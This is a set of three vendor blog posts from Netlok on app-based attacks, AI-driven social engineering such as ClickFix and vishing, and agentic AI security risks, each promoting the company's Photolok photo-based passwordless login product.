Kasey Cromer, Netlok | February 23, 2026
Executive Summary
Your employees rely on dozens of mobile and desktop apps every day to collaborate, communicate, and get work done. Attackers know this. In 2025, 83% of organizations surveyed experienced app-targeted attacks, up from 65% the year before (Digital.ai). Infostealers harvested 1.8 billion credentials (DeepStrike). Importantly, 80% of employees now use apps that IT never approved (Microsoft).
The result is an authentication crisis hiding in plain sight. Every app is an entry point. Every login is a potential vulnerability. And most security tools still focus on protecting internal assets while leaving mobile, web, and desktop apps exposed to attacks that happen outside the corporate firewall.
Here’s what security leaders need to understand:
1) Apps have become the dominant attack surface. Credential theft, OAuth token abuse, and infostealer malware all target the authentication layer that apps rely on.
2) Shadow IT is no longer the exception. With employees adopting unsanctioned apps and AI tools without oversight, organizations face authentication blind spots they cannot control.
3) Photolok Passwordless IdP addresses this gap by providing identity verification that works across apps, integrates with existing systems like Okta Workforce, and gives attackers nothing to steal, intercept, or replay.
The App Attack Surface in 2026
Apps and identity now form a single, concentrated attack surface. The chart below shows how these risks converge—app-targeted attacks climbing year over year, most employees on unsanctioned apps, and a majority of SaaS accounts still running without MFA, while nearly half of attacks trace back to shadow IT.
App-Based Security Threats (2024-2025)
Apps and identity are now the primary enterprise attack surface
Source: Digital.ai, Verizon DBIR, Microsoft, SaaS Alerts, Zluri/analyst estimates (2025 data)
The rest of this article unpacks what those numbers mean operationally for your security program.
Mobile devices are no longer just communication tools. They are central to payments, identity verification, healthcare, and enterprise processes. Desktop apps handle everything from financial transactions to customer data. Each app authenticates users, often multiple times per day, creating thousands of potential entry points for attackers.
Credential Theft at Scale
The numbers are hard to ignore. DeepStrike’s 2025 analysis found that infostealer malware harvested 1.8 billion credentials in 2025 alone. These aren’t theoretical risks. Infostealers now operate as Malware-as-a-Service, with attackers deploying them through phishing emails, malicious apps, and compromised websites.
In June 2025, researchers discovered what may be the largest credential exposure in history: roughly 16 billion login credentials compiled from infostealer logs, phishing kits, and prior breaches. The Verizon 2025 DBIR found that credential stuffing now accounts for 19% of all authentication attempts at the mid-level companies, rising to 25% at large organizations.
Mobile Apps as Attack Vectors
Mobile phishing has become significantly more effective than email. Spacelift’s 2026 research found that SMS phishing achieves click rates of 19% to 36%, compared to just 2% to 4% for email—up to nine times more effective. Mobile screens unintentionally hide full URLs and security indicators, making phishing links harder to detect (Spacelift). Users move quickly on their phones. And attackers exploit urgency with messages like “Your account is locked” or “Your package is arriving.”
CompareCheapSSL reports that 63% of mobile users received a phishing SMS in the last 90 days. Malicious apps compound the problem. Researchers detected over 100,000 fake apps across major app stores in 2025 (CompareCheapSSL). These apps steal credentials, harvest data, and install backdoors that persist even after removal. And nearly a quarter of enterprise devices now host apps installed outside official app stores that bypass app store security entirely.
Shadow IT and Unsanctioned Apps
Employees aren’t being malicious—they’re trying to be productive. But every unsanctioned app introduces authentication touchpoints that IT cannot see or secure. IBM’s 2025 research found that the average enterprise uses 975 cloud services, but IT departments officially track only 108. The vast majority remain invisible to security teams. Analyst reports from Zluri and CloudEagle peg average shadow IT remediation costs above $4.2 million. Gartner predicts that by 2027, 75% of employees will use technology outside IT oversight. The perimeter has not just expanded. It has dissolved.
Shadow AI: The Newest Blind Spot
Generative AI has created a new category of shadow IT. Employees across departments use ChatGPT, Claude, DeepSeek, and other AI tools to write code, summarize data, and automate workflows. Many do so without IT approval or oversight.
Komprise’s 2025 survey of IT executives found that 90% are concerned about shadow AI from a privacy and security standpoint. Nearly 80% have already experienced negative AI-related data incidents, and 13% report those incidents caused financial, customer, or reputational harm. Between 31% and 38% of AI-using employees enter sensitive work data into AI tools. Once that data leaves the organization, it may be logged, cached, or used for model retraining—permanently outside organizational control.
The IBM Cost of a Data Breach Report found that shadow AI incidents add roughly $670,000 to the average breach cost, pushing totals to $5.11 million versus the $4.44 million global average.
This is why identity-layer controls matter: you cannot control which AI tools employees actually use, but you can govern how they authenticate to reach sensitive data in the first place.
OAuth and Third-Party App Risk
Modern apps connect to enterprise systems through OAuth tokens, API keys, and session credentials. All of these grant access without requiring passwords at each interaction. If any of these are stolen from an unapproved app, attackers can impersonate legitimate users and access corporate data without triggering authentication alerts.
Obsidian Security reports that the biggest SaaS breach of 2025 started with a compromised third-party app exploiting OAuth tokens—with a blast radius 10x greater than direct infiltration. More than 80% of apps are unfederated behind the identity provider, meaning they operate outside SSO and MFA policies. These gaps create direct paths for attackers.
Why Traditional Authentication Is Failing
These weaknesses show up first at the app layer, where users are authenticating dozens of times per day. Unfederated apps require their own passwords and credentials, separate from corporate SSO, multiplying the number of authentication touchpoints attackers can target. Every attack we’ve described exploits the same fundamental weakness: authentication systems that can be observed, intercepted, or replicated.
Passwords remain the weakest link—the majority of hacking-related breaches still involve compromised credentials somewhere in the attack chain. AI and machine learning can now generate sophisticated phishing schemes and crack passwords far more efficiently than ever before.
SMS codes can be intercepted through SIM swapping, which the FBI’s Internet Crime Complaint Center (IC3) says led to nearly 1,000 complaints and about $26 million in reported losses in 2024 alone in the U.S. Custom vishing kits can intercept one-time passwords in real time while attackers are on the phone with victims, turning a single SIM swap into a high-impact account takeover.
Passkeys offer better phishing resistance than passwords, but the private key is often stored in device managers. If the device or manager is breached, it becomes a single point of compromise.
Biometrics add convenience, but deepfakes, voice clones, and synthetic identity attacks are making biometric spoofing significantly easier. Once compromised, biometrics cannot be reset.
Why Photolok Addresses the 2026 App Security Landscape
Photolok is not another app. It is a Passwordless Identity Provider (IdP) that functions as the front door for your apps. It works with your existing systems, including Okta Workforce and other identity platforms. As an identity provider, Photolok verifies who users are before granting access to any application. By replacing passwords at this identity layer, Photolok secures authentication across every app your employees use, whether sanctioned or not. The apps themselves never see or store credentials. They simply trust Photolok’s verification.
Steganographic photo-based authentication with AES-256 encryption: Photolok’s patented system embeds encrypted codes within photos, generating a new AES-256 code every session. Users authenticate by selecting from randomized photos only they would recognize—creating verification that cannot be observed and replayed like a password, intercepted like an SMS code, or deepfaked like a biometric.
Randomized recognition challenges: Because photos are randomized every session, AI and machine learning tools have no pattern to learn and no credential to harvest. Unlike passwords or biometrics, there is no static data for attackers to brute-force or simulate.
Device approval and fingerprinting: Users control which devices can access their account. Combined with device fingerprinting, this blocks unauthorized access attempts even if attackers somehow obtain login information.
Situational security protection: Photolok is the only login method with built-in protection for high-risk situations. The Duress Photo acts as a visual silent alarm when users are coerced—whether through social engineering, insider pressure, or threats. The 1-Time Photo protects against shoulder surfing by removing itself after a single use.
User-friendly and cost-effective: Point-and-click navigation with no passwords to remember or reset. This eliminates one of the most common IT support burdens while leveraging the brain’s natural picture-superiority effect for faster, more intuitive authentication.
What Security Leaders Should Do Now
1. Map your app attack surface. Identify all mobile, desktop, and SaaS apps that employees use—sanctioned and unsanctioned. Determine which apps are federated behind your IdP and which operate outside your authentication controls.
2. Assume credentials have been compromised. With 1.8 billion credentials harvested in 2025 alone, the question is not whether your employees’ credentials are in attacker databases, but how you protect authentication when they are. Move beyond passwords and SMS codes for high-risk access.
3. Address shadow IT at the identity layer realistically. You cannot control which apps employees actually use, but you can govern how they authenticate. Solutions like Photolok Passwordless IdP secure the identity layer regardless of what apps sit on top of it.
4. Establish AI governance before shadow AI becomes a breach. Create clear policies for which AI tools are approved and how sensitive data should be handled. Monitor for unauthorized AI usage and provide approved alternatives that meet security requirements.
5. Audit third-party app connections and integrations. Review which apps have access to your enterprise systems through OAuth tokens, API keys, and session credentials. Revoke unnecessary permissions and monitor for anomalous usage.
The Bottom Line
Your workforce runs on apps. So do attackers. Every mobile app, desktop application, and SaaS tool is an authentication touchpoint that attackers can exploit. And with 80% of employees using unsanctioned apps, you cannot secure what you cannot see.
The answer is not to fight the app explosion—it is to secure the identity layer that apps depend on. Photolok Passwordless IdP secures authentication across your app ecosystem, integrates with systems like Okta Workforce, and gives attackers nothing to steal, intercept, or replay.
These attacks show up as unplanned losses, regulatory scrutiny, and board-level questions about why known identity weaknesses were not addressed sooner. The tools exist. The question is whether your organization will deploy them before or after the breach.
Want to see how Photolok can help secure your organization’s app ecosystem?
Request Your Personalized Demo
About the Author
Kasey Cromer is Director of Customer Experience at Netlok.
Sources
[1] Digital.ai. “2025 Application Security Threat Report.” digital.ai
[2] DeepStrike. “Stealer Log Statistics 2025.” deepstrike.io
[3] Verizon. “2025 Data Breach Investigations Report.” verizon.com
[4] Spacelift. “70 Social Engineering Statistics for 2026.” spacelift.io
[5] CompareCheapSSL. “Mobile Security Statistics 2026.” comparecheapssl.com
[6] Nudge Security. “Shadow IT Discovery Guide” (citing Microsoft). nudgesecurity.com
[7] Fidelis Security. “Shadow IT Risks and Detection” (citing IBM). fidelissecurity.com
[8] Zluri. “Shadow IT Statistics 2025.” zluri.com
[9] CloudEagle. “Risks of Shadow IT.” cloudeagle.ai
[10] CIO. “Shadow AI: Hidden Agents Beyond Governance.” cio.com
[11] Bright Defense. “Data Breach Statistics 2026” (citing IBM). brightdefense.com
[12] Obsidian Security. “What Is Shadow SaaS?” obsidiansecurity.com
[13] GitProtect. “Cybersecurity Statistics 2026” (citing SaaS Alerts). gitprotect.io
[14] FBI Internet Crime Complaint Center. “2024 Internet Crime Report.” ic3.gov
[15] Netlok. “How Photolok Works.” netlok.com
Kasey Cromer, Netlok | February 12, 2026
Social engineering has always exploited human psychology. In 2026, attackers have a new partner: artificial intelligence. AI-generated phishing campaigns now achieve success rates roughly four to five times higher than traditional attacks. Deepfake voice cloning requires as little as three seconds of audio. And purpose-built criminal tools can generate thousands of hyper-personalized attack messages in seconds.
Here’s what security leaders need to understand:
1) Social engineering is now cited as a leading cyber threat for 2026, with sharp year-over-year increases anticipated in the number of attempts, AI-generated campaigns, and business email compromise (BEC) losses, and 94% of businesses experienced at least one social engineering incident in 2025
2) Attackers have moved beyond email to orchestrate multi-channel campaigns combining phishing, vishing, SMS, and deepfake video across platforms like Slack, Teams, and WhatsApp
3) Traditional MFA is failing. The identity layer has become the primary battleground, and Photolok’s patented photo-based authentication addresses this gap directly with verification that AI cannot predict, clone, or replay
Key Social Engineering Metrics
| Metric | Finding | Source |
| Average cost of a phishing-driven breach | $4.88M per incident | IBM/Huntress 2025 |
| SMS phishing (smishing) vs. email phishing effectiveness | 19-36% click rate vs. 2-4% for email (up to 9x more effective) | Spacelift 2026 |
| Cloud breaches starting with compromised credentials | 46% of cloud breaches begin with stolen credentials, often obtained via social engineering | CompareCheapSSL 2025 |
| Training effectiveness (sustained vs. one-time) | One-time training reduces susceptibility by only 8%; continuous training improves effectiveness to 23% | CompareCheapSSL 2025 |
| Third-party involvement in breaches | 30% of breaches now involve third parties | Verizon DBIR 2025 |
| Small business survival rate post-breach | 60% shut down within 6 months after a major breach | Huntress 2025 |
The Five Social Engineering Trends Reshaping 2026
1. AI-Powered Hyper-Personalization at Scale
The old advice about spotting phishing (“look for spelling mistakes,” “check the tone”) is obsolete. Modern large language models produce grammatically flawless, contextually accurate messages that mirror your organization’s communication style.
According to SecurityWeek’s Cyber Insights 2026 report, attackers now use AI to scrape social media activity, job roles, company updates, and even earnings calls to generate messages that feel authentic. The result? Phishing emails that reference your recent product launch, congratulate you on a promotion, or follow up on a project you discussed publicly.
HYPR CEO Bojan Simic described the shift directly: “What once targeted human error now leverages AI to automate deception at scale. Deepfakes, synthetic backstories, and real-time voice or video manipulation are no longer theoretical; they are active, sophisticated threats designed to bypass traditional defenses and exploit trust gaps.”
What makes this particularly dangerous is scale. Attackers can now launch hyper-personalized campaigns at mass phishing volume. The economics have shifted decisively in attackers’ favor.
2. Deepfakes Move from Headlines to Standard Playbook
Deepfakes are no longer fringe tools. They’re now a scalable part of social engineering campaigns, woven across entire attack chains rather than used as isolated tricks.
The numbers tell the story: Gartner predicts that by the end of 2026, 30% of enterprises will no longer consider standalone identity verification and authentication solutions reliable in isolation. This shift reflects a stark reality: deepfake attacks bypassing biometric authentication increased 704% in 2023, and the deepfake technology has only improved since.
Real attacks are already causing real damage. In one widely cited case, a finance employee authorized a transfer of roughly $25 million after joining what they believed was a legitimate video call with their CFO. Both the likeness and voice were deepfaked. In early 2026, X-PHY CEO Camellia Chan stated that “deepfakes will become the default social engineering tool by year-end 2026.”
The barrier to entry has collapsed. Attackers now use voice cloning in phone calls with real-time synthesis that replicates an executive’s tone, cadence, and vocal signature. Short-form deepfake videos (15-30 seconds) are being embedded in WhatsApp messages and Slack channels, appearing as urgent updates from leadership.
3. Vishing and Help Desk Attacks Surge
Voice phishing (vishing) has transformed with AI voice-cloning tools. In multiple industries, vishing has replaced traditional phishing as the top social engineering threat.
In January 2026, Okta’s threat researchers warned about custom vishing phishing kits being sold on dark web forums. These kits allow attackers to control authentication flows in real-time while on the phone with victims. The attacker creates a custom phishing page, spoofs a phone number to impersonate IT help desk, and convinces targets to visit the page under pretexts like “setting up a passkey” or “verifying account security.”
The ShinyHunters cyber extortion syndicate has already claimed access to major companies through exactly this technique: vishing Okta SSO credentials. Help desk staff become the weak link when they relax verification procedures to accommodate callers who sound panicked.
These attacks succeed because caller ID is easily spoofed and still treated as partial proof of identity. High-impact actions like resetting MFA or granting access to sensitive tools go through without verification through a separate, trusted channel.
Defenses include requiring callback verification to a known number (not one provided by the caller), implementing code-based verification where the help desk provides a code the caller must retrieve from their authenticated account, and training staff that urgency is itself a red flag.
4. ClickFix: The Attack That Makes You Infect Yourself
A concerning trend has emerged rapidly through 2025 and into 2026: ClickFix attacks. These campaigns use fake CAPTCHA prompts or browser error messages to trick users into running malicious commands on their own computers.
The attack is deceptively simple. You land on a webpage showing what looks like a CAPTCHA (“Verify you are human”) or a browser error (“Update required”). The prompt tells you to press Windows+R to open the Run dialog. You’re then instructed to paste (Ctrl+V) and press Enter. What you don’t realize is that malicious code was silently copied to your clipboard when you clicked the fake prompt.
Microsoft, SentinelOne, and Proofpoint have all documented active ClickFix campaigns. The technique has been adopted by nation-state actors including Kimsuky (North Korea), MuddyWater (Iran), and APT28 (Russia). Criminal groups use it to deliver infostealers like Lumma Stealer and remote access trojans.
ClickFix works because it exploits user fatigue with anti-spam mechanisms and bypasses conventional security tools. The user executes the malware themselves, so there’s no exploit to detect.
5. Agentic AI and Multi-Channel Coordinated Attacks
Social engineering no longer arrives through a single channel, and it’s no longer manually orchestrated. Agentic AI is turning social engineering into an end-to-end automated operation, from reconnaissance to outreach to post-compromise lateral movement.
Forrester predicts that chains of specialized AI agents are emerging: some focus on reconnaissance, others craft lures, others manage infrastructure, together enabling mostly autonomous social engineering operations. Attackers now orchestrate campaigns across email, phone, SMS, and collaboration platforms simultaneously.
A common flow: an email warning about suspicious activity, followed by a vishing call to “confirm your details.” Or a convincing voice message backed up by a phishing link via SMS. If the target ignores one channel, the attacker pivots to another.
Cloud Range’s 2026 analysis found that attackers combine real user data from breaches, AI-generated personas, and automated messaging systems to deceive employees and consumers at scale. Detection and response must focus on interaction patterns, not single events.
Why Traditional MFA Is Failing
Here’s the uncomfortable truth: traditional multi-factor authentication is increasingly being defeated.
The custom vishing kits documented by Okta in January 2026 can intercept SMS or voice one-time passwords, push-based MFA, and app-based time-based one-time passwords. Because attackers can control the pages shown to targets and synchronize them with spoken instructions, they defeat MFA not resistant to phishing attacks.
The research firm Xcitium reported a 45% year-over-year rise in 2FA phishing attacks in 2025, with global damages recorded at $1.2 billion, noting that over 70% of targeted corporate attacks now involve some form of 2FA bypass.
Phishing-resistant MFA options like FIDO2/WebAuthn security keys, passkeys, and certificate-based authentication offer stronger protection. But most organizations haven’t deployed them broadly, leaving employees vulnerable to attacks that bypass what they believe is strong authentication.
Why Photolok Addresses the 2026 Threat Landscape
Every attack we’ve described exploits the same fundamental weakness: authentication systems that can be observed, intercepted, or replicated. Passwords can be phished. SMS codes can be intercepted. Push notifications can be socially engineered. Even biometrics face growing threats from deepfakes.
This is why we built Photolok at Netlok. Photolok’s patented photo-based authentication uses steganographic-coded images that randomize every session. The authentication process relies on cognitive recognition, where users select from photos only they would recognize, creating a verification method that randomizes each session, so even if observed, the selection cannot be reused by an attacker, intercepted in transit like an SMS code, or deepfaked like biometric data.
Against AI-powered social engineering: Because Photolok’s login process uses dynamic photo randomization and embedded steganographic codes, AI and machine learning tools have no pattern to learn and no credential to harvest.
Against vishing and help desk attacks: When an employee is pressured to ‘verify their identity’ over the phone, Photolok’s visual selection process resists transfer to an attacker. Even if the user describes their photo, the attacker must identify it from a randomized set of images, making accurate selection more difficult. There’s nothing to read aloud, nothing to type into a fake portal.
Against coercion scenarios: The Duress Photo feature addresses what happens when social engineering succeeds at the human level. If someone is being coerced into authenticating, whether through manipulation, insider pressure, or threats, they can select a designated photo that grants access but silently alerts security. In an era where AI makes social engineering more convincing than ever, this silent alarm provides a critical safety net.
What Security Leaders Should Do Now
1. Assume your employees will be targeted with AI-enhanced attacks. Training that focuses on spelling errors and generic greetings is obsolete. Update awareness programs to address AI-generated content, deepfake audio and video, and multi-channel attack sequences.
2. Deploy phishing-resistant authentication. Traditional MFA is no longer sufficient for high-risk roles and sensitive systems. Evaluate solutions like Photolok that resist the specific attack vectors dominating 2026: credential interception, real-time phishing proxies, and AI-powered impersonation.
3. Harden help desk and support workflows. Require callback verification to a pre-verified contact number for high-impact actions like MFA resets, password changes, and access grants. Caller ID and callback numbers should never be treated as proof of identity.
4. Implement detection for multi-channel attack patterns. Single-channel monitoring misses coordinated campaigns. Security operations should correlate suspicious activity across email, voice, SMS, and collaboration platforms.
5. Establish verification protocols for financial transactions. Any request involving wire transfers, payment changes, or sensitive data should require confirmation through a channel the attacker cannot control.
6. Brief leadership on the AI-enhanced threat landscape. Social engineering losses are a board-level issue. Ensure executives understand that the attacks of 2026 look nothing like the phishing emails they remember.
The Bottom Line
Social engineering has always been about exploiting human trust. In 2026, AI has made that exploitation faster, more convincing, and infinitely scalable. Attackers can clone voices from seconds of audio, generate thousands of personalized attack messages instantly, and orchestrate multi-channel campaigns that adapt in real time.
These attacks show up as unplanned losses, regulatory scrutiny, and board-level questions about why known identity weaknesses were not addressed sooner. They are not just IT incidents; they are enterprise risk events.
The organizations that will avoid becoming the next cautionary tale are those investing in authentication that cannot be socially engineered: systems where there’s nothing to intercept, nothing to replay, and nothing an AI can learn to predict.
Photolok addresses this reality directly. When the attack exploits human psychology, the defense must go beyond human vigilance.
The tools exist. The question is whether your organization will deploy them before or after the breach.
Want to see how Photolok can help secure your organization against AI-powered social engineering?
Request Your Personalized Demo
About the Author
Kasey Cromer is Director of Customer Experience at Netlok.
Sources
[1] ZeroFox Intelligence. “2026 Cyber Threat Predictions and Recommendations.” December 2025. https://www.zerofox.com/blog/2026-cyber-threat-predictions/
[2] SecurityWeek. “Cyber Insights 2026: Social Engineering.” January 2026. https://www.securityweek.com/cyber-insights-2026-social-engineering/
[3] Cloud Range. “5 Key Social Engineering Trends in 2026.” January 2026. https://www.cloudrangecyber.com/news/5-key-social-engineering-trends-in-2026
[4] Hoxhunt. “Vishing Attacks Surge 442%.” December 2025. https://hoxhunt.com/blog/vishing-attacks
[5] Help Net Security. “Okta Users Under Attack: Modern Phishing Kits Are Turbocharging Vishing Attacks.” January 2026. https://www.helpnetsecurity.com/2026/01/23/okta-vishing-adaptable-phishing-kits/
[6] BetaNews. “AI as a Target, Web-Based Attacks and Deepfakes: Cybersecurity Predictions for 2026.” January 2026. https://betanews.com/2025/12/22/ai-as-a-target-web-based-attacks-and-deepfakes-cybersecurity-predictions-for-2026/
[7] Keepnet Labs. “250+ Phishing Statistics and Trends You Must Know in 2026.” January 2026. https://keepnetlabs.com/blog/top-phishing-statistics-and-trends-you-must-know
[8] Keepnet Labs. “Deepfake Statistics and Trends 2025.” November 2025. https://keepnetlabs.com/blog/deepfake-statistics-and-trends
[9] DeepStrike. “Deepfake Statistics 2025: AI Fraud Data and Trends.” September 2025. https://deepstrike.io/blog/deepfake-statistics-2025
[10] Hoxhunt. “Business Email Compromise Statistics 2026.” January 2026. https://hoxhunt.com/blog/business-email-compromise-statistics
[11] FBI IC3. “Business Email Compromise: The $55 Billion Scam.” September 2024. https://www.ic3.gov/PSA/2024/PSA240911
[12] Abnormal AI. “Threat Report: BEC and VEC Attacks Show No Signs of Slowing.” November 2025. https://abnormal.ai/blog/bec-vec-attacks
[13] Microsoft Security Blog. “Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique.” August 2025. https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[14] Proofpoint. “ClickFix Social Engineering Technique Floods Threat Landscape.” February 2025. https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
[15] SentinelOne. “Caught in the CAPTCHA: How ClickFix Is Weaponizing Verification Fatigue.” May 2025. https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
[16] Xcitium Threat Labs. “Unmasking Sneaky 2FA: How Modern Phishing Kits Bypass MFA in 2026.” January 2026. https://threatlabsnews.xcitium.com/blog/unmasking-sneaky-2fa-how-modern-phishing-kits-bypass-mfa-in-2026/
[17] Jericho Security. “Voice Phishing Is Rising: Why ‘Just a Phone Call’ Is Now a Real Threat.” February 2026. https://www.jerichosecurity.com/blog/voice-phishing-vishing-prevention
[18] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/
[19] Spacelift. “Social Engineering Statistics.” 2025. https://spacelift.io/blog/social-engineering-statistics
[20] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/
[21] Huntress. “Impact of Social Engineering: Key Statistics on Businesses.” 2025. https://www.huntress.com/social-engineering-guide/impact-of-social-engineering-key-statistics-on-businesses
[22] CompareCheapSSL. “100+ Social Engineering Statistics in 2025.” December 2025. https://comparecheapssl.com/100-social-engineering-statistics-in-2025-the-latest-stats-and-trends-revealed
[23] Keepnet Labs. “Security Awareness Training Statistics.” January 2026. https://keepnetlabs.com/blog/security-awareness-training-statistics
Kasey Cromer, Netlok | January 27, 2026
Autonomous AI agents are now executing code, authorizing payments, and modifying systems across enterprise environments. According to PwC’s 2025 AI Agent Survey, 79% of organizations are already adopting AI agents, with Gartner predicting that 40% of enterprise applications will feature task-specific AI agents by the end of 2026 (up from less than 5% in 2025). The transformation is happening at unprecedented speed, and most organizations are deploying these systems without the governance frameworks needed to prevent systemic failures, regulatory violations, board-level accountability crises, and missed ROI targets. MIT research found that 95% of enterprise generative AI projects fail to deliver measurable financial returns, often because of inadequate governance and poor data foundations.
Here’s what security leaders need to know:
1) OWASP released its first Top 10 for Agentic Applications in December 2025, identifying critical risks from goal hijacking to rogue agents that security teams must address immediately.
2) Forrester predicts that agentic AI will cause a major public breach in 2026, with consequences severe enough to result in employee dismissals.
3) The identity layer is the critical control point, and Photolok’s patented photo-based authentication addresses this gap directly, replacing vulnerable credentials with dynamic, steganography-powered verification that AI cannot predict, harvest, or replay.
The Numbers That Define 2026
| Metric | Finding | Source |
| Companies with AI agents in production | 57% of enterprises surveyed | G2 August 2025 |
| Practitioners citing security as top AI agent challenge | 62% of AI practitioners surveyed | Warmly Research 2025 |
| Vulnerable agent framework components identified | 43 distinct components compromised via supply chain | Stellar Cyber 2025 |
What Makes Agentic AI Different (and Dangerous)
If you’ve been following AI developments, you might think this is just another incremental step. It’s not. The shift from generative AI to agentic AI represents a categorical change in risk.
Here’s the difference: A standard large language model generates content like text or code. An agentic AI takes that several steps further. It uses tools, makes decisions, and performs multi-step tasks autonomously in digital or physical environments. It doesn’t just talk; it does.
Think about what that means in practice. As an example, an AI agent handling procurement can autonomously negotiate with suppliers, issue purchase orders, and authorize payments. A customer service agent can access customer records, modify accounts, and execute transactions. A security operations agent can respond to alerts, quarantine systems, and modify access controls.
When software can make decisions and act on its own, security strategies must shift from static policy enforcement to real-time behavioral governance. The OWASP GenAI Security Project put it directly: “Once AI began taking actions, the nature of security changed forever.”
The OWASP Top 10 for Agentic Applications: Your New Security Framework
In December 2025, OWASP released the first comprehensive security framework specifically designed for autonomous AI systems. This framework names the ten most critical security risks for autonomous/agentic AI systems and gives high-level guidance to mitigate them. It is meant as the “field manual” for securing Al agents that can plan, act, use tools, and make decisions across workflows, similar in spirit to the classic OWASP Top 10 for web apps but focused on agentic Al. Developed with input from over 100 security researchers and providers including AWS and Microsoft, the Top 10 for Agentic Applications was built from real incidents – confirmed cases of data exfiltration, remote code execution, memory poisoning, and supply chain compromise.
The 10 risks (at a glance)
The Shadow Agent Problem Nobody Wants to Talk About
Remember shadow IT? We’re seeing the exact same pattern with AI agents now, except the stakes are exponentially higher.
According to Omdia research, while many enterprises deploy AI agents within controlled environments like Salesforce Agentforce, the real value comes from touching core applications and processes. That’s also where significant cyber risk lives. Employees are connecting AI tools to company systems without IT oversight, development teams use AI coding assistants with broad repository access, and business units deploy automation agents with excessive privileges. Each of these creates unvetted identity providers and data paths that exist entirely outside normal IAM controls.
The Barracuda Security report from November 2025 identified 43 agent framework components with embedded vulnerabilities via supply chain compromise. Researchers have already discovered malicious MCP (Model Context Protocol) servers in the wild. MCP servers are essentially plug-in tools that extend what agents can do, and a compromised one gives attackers direct access to agent capabilities. One malicious package impersonated a legitimate email service but secretly forwarded every message to an attacker. Another contained dual reverse shells. Any AI agent using these tools was unknowingly exfiltrating data or providing remote access.
Why Traditional Authentication Fails the Agentic AI Challenge
Every security incident I’ve described, whether its goal is hijacking, privilege escalation, or rogue agents, eventually comes down to identity and access. Traditional authentication wasn’t designed for a world where autonomous systems need verified identities, where the line between human and machine actors blurs, and where attackers use AI to generate convincing impersonations at machine speed.
For internal use (protecting team members): How do you ensure the person authorizing an agent’s action is actually who they claim to be? How do you detect coercion? For example, traditional passwords are vulnerable to phishing, and AI now generates sophisticated social engineering attacks.
For customer-facing applications: When AI agents handle customer interactions, how do you verify identity without friction? Biometrics face growing threats from deepfakes that convincingly impersonate real people.
For agent-to-system authentication: As Salesforce’s Model Containment Policy emphasizes, AI models must be granted only the minimum necessary capabilities. Enforcing this requires robust authentication at every access point, something static credentials cannot provide.
What is the solution?
This is why we built Photolok at Netlok. Passwords and static one-time codes were designed for human logins in a pre-cloud, pre-agentic AI world, not for autonomous systems making thousands of decisions at machine speed. Photolok’s patented photo-based authentication uses steganography-coded images that randomize every session, creating a verification method designed for a world where attackers use AI to harvest, guess, and replay credentials at machine speed.
For internal teams: Photolok’s intuitive selection process, where users recognize and select their login photos, cannot be replicated by AI or automated systems. When an employee authorizes a sensitive agent action, you have high confidence it’s actually them.
The Duress Photo feature addresses scenarios after security tools are ignored. If someone is being coerced into approving an agent’s action, whether through social engineering, physical threat, or insider pressure, they can select a designated photo that grants access but silently alerts security. This applies not just to physical coercion but also to high-stakes financial approvals, privileged access changes, and any agent-executed transaction where verification matters. In an era where AI agents execute transactions in milliseconds, this silent alarm could prevent catastrophic damage.
Against AI-powered attacks: Because Photolok’s login process uses dynamic photo randomization and embedded steganographic codes, AI/ML tools have minimal attack surface.
Learning from Enterprise AI Governance: The Salesforce Model
Salesforce’s approach to agentic AI security, documented in their Model Containment Policy and AI Acceptable Use Policy, provides a blueprint every organization should study. Their core principle: “The model reasons; the platform decides.” LLMs provide language intelligence, but configuration provides authority, safety, and accountability.
Key governance requirements:
No Autonomous Authority: AI models may recommend, summarize, classify, or assist, but must not make final decisions with legal, financial, safety, or rights-impacting consequences. Final authority must reside with a human or deterministic system.
Deterministic Control Over Probabilistic Behavior: Critical behaviors must be enforced outside the model. Routing, permissions, approvals, and enforcement must not rely on model judgment. Prompts may guide behavior but must never be the sole enforcement mechanism.
Human-in-the-Loop Requirements: Human review is mandatory when AI output affects individuals’ rights, is used in regulated domains, is externally published, or supports high-risk decisions.
No Self-Expansion: AI models must not modify their own instructions, permissions, or scope; generate or deploy new tools; escalate privileges; or chain actions indefinitely without external limits.
These aren’t optional guidelines. They’re foundational requirements for safe AI agent deployment.
The Real Cost of Waiting
The organizations deploying AI agents today face a choice: implement proper governance now, or scramble to explain failures later.
Omdia analyst Todd Thiemann’s prediction for 2026 is blunt: “Some early AI agent deployments will get pushed into production with inadequate QA testing, insufficient security guardrails, or an over-permissioned agent, and we will start to see mischief involving AI agents. I expect 2026 will see AI agents touching core business processes, and some high-profile data breaches and fraud originating from those AI agents.”
Forrester’s prediction is even more direct: Agentic AI will cause a major public breach in 2026 that will lead to employee dismissals. When that breach happens, expect board investigations, regulatory scrutiny over data protection and financial controls, and serious questions about executive accountability. The fallout won’t be limited to IT departments.
The question isn’t whether your organization will face these risks. It’s whether you’ll be ready when they arrive.
What Security Leaders Should Do Now
1. Audit your AI agent exposure. Find out what agents your organization is actually using, what systems they can access, and what actions they can take. You can’t secure what you don’t know about.
2. Implement the principle of least agency. Every AI agent should have minimum autonomy required. Review and restrict agent permissions aggressively. Require human approval before agents can execute financial transactions, modify access controls, delete data, or take any action that cannot be easily reversed.
3. Establish deterministic controls for critical decisions. Don’t rely on prompts (the natural language instructions that tell AI agents what to do and how to behave) for security enforcement. Build guardrails into your architecture that cannot be bypassed through prompt manipulation.
4. Rethink authentication for the agentic era. Evaluate modern alternatives like Photolok that resist AI-powered attacks and provide verification that autonomous systems cannot fake.
5. Build strong observability. Implement comprehensive logging of agent actions. Monitor for behavioral anomalies. Create kill switches for rapid disabling.
6. Brief your leadership. AI agent security is a governance issue. Ensure your board of directors understands the stakes before an incident forces that conversation.
The Bottom Line
The enterprise AI landscape in 2026 is moving faster than most security frameworks can adapt. AI agents are no longer experiments. They’re production systems with real permissions and real consequences. The organizations that act now to implement proper governance, authentication, and observability will be the ones that capture the value of agentic AI without becoming the next cautionary tale. This will also provide protection of financial results and preserve ROI.
The OWASP Agentic Top 10 gives us a framework. Enterprise policies like Salesforce’s provide governance blueprints. Modern authentication like Photolok addresses the identity challenges that traditional methods cannot solve.
The tools exist. The question is whether your organization will use them before or after the breach.
